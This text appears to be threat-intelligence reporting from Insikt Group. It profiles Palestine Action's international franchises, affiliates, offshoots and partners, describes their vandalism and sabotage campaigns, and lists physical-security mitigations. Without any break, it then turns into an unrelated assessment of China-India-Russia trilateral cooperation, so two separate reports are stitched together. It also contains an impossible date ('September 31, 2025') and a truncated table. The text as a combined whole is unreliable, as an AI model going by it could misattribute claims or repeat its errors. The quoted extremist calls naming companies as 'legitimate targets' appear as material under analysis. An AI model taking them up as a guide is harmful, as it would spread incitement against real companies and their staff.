We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in Table 1, our four-part classification labels Palestine Action network groups as either Palestine Action franchises, affiliates, offshoots, or partners, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.
Table 1 (only the final rows were preserved):
Examples: Unity of Fields (US), Shut Elbit Down (Germany/Austria)
Partner | Area of operation, TTPs | Ideology, targets | Shut the System (UK)
Table 1: Classification of Palestine Action global network groups (Source: Insikt Group)
Franchise: Palestine Action Italia/Palestina Libera (Italy)
Figure 7: Palestine Action Italia logo (Source: Palestine Action Italia)
Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.
The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 issue of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency & Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023.
Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:
On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including obstructing a runway at Pisa International Airport, occupying several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.
On September 29, 2025, the group claimed to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.
On September 25, 2025, several of the group’s activists chained themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”
Affiliate: Death to Toll (Australia)
“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.
The first attack claimed by this group was a sabotage of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an obstruction of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers cited Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.
In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:
On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spray-painted the truck with red graffiti.
On August 31, 2025, AVEs claimed to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.
On August 11, 2025, AVEs claimed to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll confirmed the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.
Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”
Offshoot: Unity of Fields (United States)
Figure 9: Unity of Fields logo (Source: Social Media)
Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.
UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with insight from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.
From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto leaders between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US attack on an Elbit facility in Merrimack.
In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.
Autonomous pro-Palestinian activists across the US have sent UoF several dozen claims of responsibility for publication, covering operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:
An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia
A May 29, 2025, communiqué claiming responsibility for spray-painting several pro-Palestinian messages on a Maersk shipping container in Oakland, California
A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building
UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh reported on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she participated in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.
Partner: Shut the System (United Kingdom)
Figure 10: Shut the System logo (Source: Social Media)
Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely emerged as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.
The first reported Shut the System operation took place in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 communiqué, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 article from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action conducted a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.
Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with groups that are almost certainly Palestine Action offshoots. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:
On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.
On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”
On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company responsible for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.
From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber-optic lines. Instructions on Shut the System’s website demonstrate how to identify fiber-optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.
Mitigations
The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&W) of planned activities.
To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.
Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.
Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.
Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.
Review and, where necessary, implement governmental guidelines for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.
Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.
Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.
Outlook
While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.
Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.
Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.
Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.
United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.
The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).
However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.
Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.
Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.
Key Findings
The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.
However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.
The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.
An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.
Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.
Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia
We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.
India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– necessitates looking for alternative markets and deepening foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including cultivating its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs called the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically highlighted the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s increasing oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly monitoring the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely repair, the deteriorating diplomatic and economic ties between India and the US.
The US tariffs have likely also reinforced an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.
Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi stated that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin (Figure 1) at the SCO Summit sparked concerns over an emergent Russia-India-China troika.
Figure 1: Photo posted by Modi of himself with Putin and Xi at the SCO Summit on August 31, 2025 (Source: Social Media)
The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.
Areas of Bilateral Intersection and Divergence Among China, India, and Russia
Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.
China’s Foreign Policy
China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” such as preserving the CCP’s political power, territorial integrity, and economic development, as well as China’s efforts to shape a “multipolar” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main perceived threat — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely considers India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.
India’s Foreign Policy
India almost certainly defines its relationships with China and Russia through its doctrine of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in founding the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic balancing act seeking to promote an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also underpinned by a “multi-alignment” policy, which very likely seeks to promote and safeguard India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has cultivated its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.
Russia’s Foreign Policy
Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:
Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most sanctioned state in the world.
China-Russia: Strategic Partners in Countering the West
In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.
Political Dynamics
Chinese and Russian leadership almost certainly see each other as primary strategic partners in advancing the “multipolar” world. In 2023, Xi said to Putin, “We are the ones driving” changes unseen in a century, and multiple joint statements have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the Global Governance Initiative, Global Security Initiative, and Global Development Initiative.
Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have met over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia declared a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.
Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has decreased by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade disruptions and sanctions (1, 2, 3). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, prefers a protracted conflict in Ukraine as it diverts the US’s focus away from China.
At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document prepared by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.
Economic Dynamics
Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade denominated in Chinese yuan.
China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially increased. On September 2, 2025, Russia and China signed a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China buys Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly cancelled orders of Russian oil imports following US sanctions in late October 2025.
In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of dual-use and military-relevant goods and expertise. As of mid-2025, dual-use exports to Russia likely have at least slightly decreased from their peak in 2024.
Overall trade between China and Russia has also grown significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly double that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border crossings –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also expanding, and China and Russia have announced deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).
There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to avoid overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began halting transactions with Russian customers, and at least one bank did so as recently as September 2025 after being sanctioned by the EU. In September 2024, China implemented a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.
Military Dynamics
Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more frequent and more complex, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to participate in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise involved a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber flight into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia conducted their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.
In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he stated that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further indicates that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”
Beyond military exercises, US officials have asserted as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government asserts that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is providing Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US sanctioned a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were working on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been involved in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.
Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.
Cooperation in Propaganda and Influence Operations
We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, including media forums, journalist exchange activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement stating that they would “jointly articulate a common stance in the global media space.”
